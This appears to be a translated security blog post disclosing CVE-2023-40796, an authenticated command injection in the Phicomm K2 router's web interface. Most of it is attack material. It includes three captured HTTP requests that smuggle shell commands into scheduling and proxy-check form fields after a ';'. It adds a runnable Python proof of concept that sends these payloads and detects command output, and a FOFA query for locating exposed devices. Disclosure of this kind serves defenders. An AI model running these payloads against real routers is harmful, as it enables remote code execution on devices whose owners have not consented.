Introduction
The Phicomm K2 uses 802.11ac wireless technology for more stable Wi-Fi performance and a stronger, cleaner wireless signal, with dual-band concurrent throughput of up to 1200 Mbps. To better address signal interference in the home, the K2 uses a dual-band design: the 5 GHz band offers more channels, which reduces interference from surrounding wireless signals and makes data transfer more efficient. The K2 also uses a PA+LNA module from the wireless semiconductor vendor Skyworks; the PA raises transmit power and the LNA lowers receive-side noise, so both directions benefit. The vendor claims 2.4 GHz wireless performance up to 4x that of an ordinary router and 5 GHz wireless performance up to 5x.
Vulnerability description
The shadowsocksr.lua, timerbooter.lua and wifireboot.lua handlers of the Phicomm K2 router's LuCI web interface pass incoming request parameters to a shell without sanitizing them, which allows remote command execution. The captured requests below show the pattern: a `;` inside a time-range value, or inside the `set` parameter, terminates the handler's intended command and the attacker's own commands (`id`, `pwd`) follow it. Exploitation is post-authentication: every request carries the session's stok token in the URL path and the sysauth cookie issued at login.
Affected versions
CVE: CVE-2023-40796
Phicomm K2 V22.6.529.216; other product series have not yet been verified.
Verified by the author: other versions are also affected; as long as the vulnerable interface exists, the vulnerability may be present. For some interfaces or versions, the response does not contain the execution result after the payload runs.
Cyberspace mapping
Reply "CVE-2023-40796" to this public account to get the cyberspace-mapping search query.
Exploitation
First log in to the router's admin backend. The stok token that the login places in the URL path (after `;stok=`) and the sysauth cookie are what authorize the requests below; `xxx` values in the captures are redacted.
Vulnerable endpoint 1: /admin/wifireboot (wifireboot.lua). The injection is in the wifiRebootrange field (`12:00; id; pwd`); the `%s` values are unfilled placeholders left in the published capture.

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxa404162/admin/wifireboot HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 566
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx.xxx.xxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMxXftWGyzoxhV5cc
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxa404162/admin/wifiset/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=xxxxxxxxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close

------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id; pwd
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-data; name="cururl2"

http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxa4053a404162/admin/wifiset/
------WebKitFormBoundaryMxXftWGyzoxhV5cc--
Vulnerable endpoint 2: /admin/timereboot (timerbooter.lua). The injection is in the timeRebootrange field (`00:05; id ; pwd`).

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxa404162/admin/timereboot HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 458
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx.xxx.xxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9LxasH5JIOWajic
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxa404162/admin/wifiset/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=xxxxxxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close

------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="timeRebootEnablestatus"

on
------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="timeRebootrange"

00:05; id ; pwd
------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="cururl"

http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxa4053a404162/admin/wifiset/
------WebKitFormBoundaryU9LxasH5JIOWajic--
Vulnerable endpoint 3: /admin/shadowsocksr/check (shadowsocksr.lua). The injection is in the set field (`;id;`). The capture ends with the boundary line as published.

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxxxxx04162/admin/shadowsocksr/check HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9LxasH5JIOWajic
Referer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxa404162/admin/shadowsocksr/status
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=xxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
Content-Length: 143

------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="set"

;id;
------WebKitFormBoundaryU9LxasH5JIOWajic
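The three requests above, rebuilt as a small Python PoC. This is an added example and not code from the original post or from Phicomm/LuCI. It assumes a host, stok token and sysauth cookie obtained from a prior login (passed on the command line), uses a generic return URL rather than the captured full admin URL, and substitutes assumed values (`on`, `12:30`) for the two fields the capture leaves as `%s`. The response check looks for the `uid=...gid=...` output of `id`; the author notes that some interfaces and versions return nothing, in which case the check reports the request as blind.

```python
# Added example, not code from the original post or from Phicomm/LuCI.
# Rebuilds the three multipart POSTs captured above and checks a response for
# the output of the injected `id`. Host, stok and sysauth are assumed to come
# from a prior login; the two `%s` fields of the first capture get assumed values.
import http.client
import re

CRLF = "\r\n"
BOUNDARY = "----WebKitFormBoundaryMxXftWGyzoxhV5cc"  # boundary taken from the capture


def multipart_body(fields, boundary=BOUNDARY):
    """Encode (name, value) pairs the way a browser form post does."""
    parts = []
    for name, value in fields:
        parts.append(f"--{boundary}{CRLF}"
                     f'Content-Disposition: form-data; name="{name}"{CRLF}{CRLF}'
                     f"{value}{CRLF}")
    parts.append(f"--{boundary}--{CRLF}")
    return "".join(parts).encode()


def injection_fields(endpoint, cmd, cururl="/cgi-bin/luci/"):
    """Form fields for one of the three vulnerable handlers.

    The command follows a ';' inside a value the handler hands to a shell,
    matching the captured payloads '12:00; id; pwd', '00:05; id ; pwd' and ';id;'.
    cururl is the return URL; the captures use the full admin wifiset URL.
    """
    if endpoint == "wifireboot":
        return [
            ("wifiRebootEnablestatus", "on"),      # assumed; capture shows '%s'
            ("wifiRebootrange", f"12:00; {cmd}"),
            ("wifiRebootendrange", "12:30"),       # assumed; capture shows '%s:'
            ("cururl2", cururl),
        ]
    if endpoint == "timereboot":
        return [
            ("timeRebootEnablestatus", "on"),
            ("timeRebootrange", f"00:05; {cmd}"),
            ("cururl", cururl),
        ]
    if endpoint == "shadowsocksr/check":
        return [("set", f";{cmd};")]
    raise ValueError(f"unknown endpoint {endpoint!r}")


# `id` on a BusyBox/OpenWrt-style system prints e.g. 'uid=0(root) gid=0(root)'.
ID_OUTPUT = re.compile(r"uid=\d+\([^)]+\)\s+gid=\d+")


def command_output_leaked(response_text):
    """True if the response echoes the injected `id` output; False means blind."""
    return ID_OUTPUT.search(response_text) is not None


def send(host, stok, sysauth, endpoint, cmd="id", timeout=10):
    """Deliver one payload. Needs a valid stok and sysauth from a real login."""
    path = f"/cgi-bin/luci/;stok={stok}/admin/{endpoint}"
    body = multipart_body(injection_fields(endpoint, cmd))
    conn = http.client.HTTPConnection(host, timeout=timeout)
    conn.request("POST", path, body=body, headers={
        "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
        "Content-Length": str(len(body)),
        "Cookie": f"sysauth={sysauth}",
        "Referer": f"http://{host}/cgi-bin/luci/;stok={stok}/admin/wifiset/",
        "Connection": "close",
    })
    resp = conn.getresponse()
    text = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, text, command_output_leaked(text)


if __name__ == "__main__":
    import sys
    host, stok, sysauth = sys.argv[1:4]  # e.g. 192.168.2.1 <stok> <sysauth>
    for ep in ("wifireboot", "timereboot", "shadowsocksr/check"):
        status, text, leaked = send(host, stok, sysauth, ep)
        print(ep, status, "output echoed" if leaked else "no echo (blind)")
```

Because the wifireboot and timereboot handlers store a schedule, a payload left in those fields may be re-executed later by whatever consumes the saved value; clean up the test settings on the device after verifying.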
Cyberspace mapping query
FOFA (Base64): cHJvZHVjdD0iUEhJQ09NTS1LMiI=
which decodes to product="PHICOMM-K2".
Originally published on the WeChat public account 不够安全: CVE-2023-40796: Phicomm K2 router remote command execution, with PoC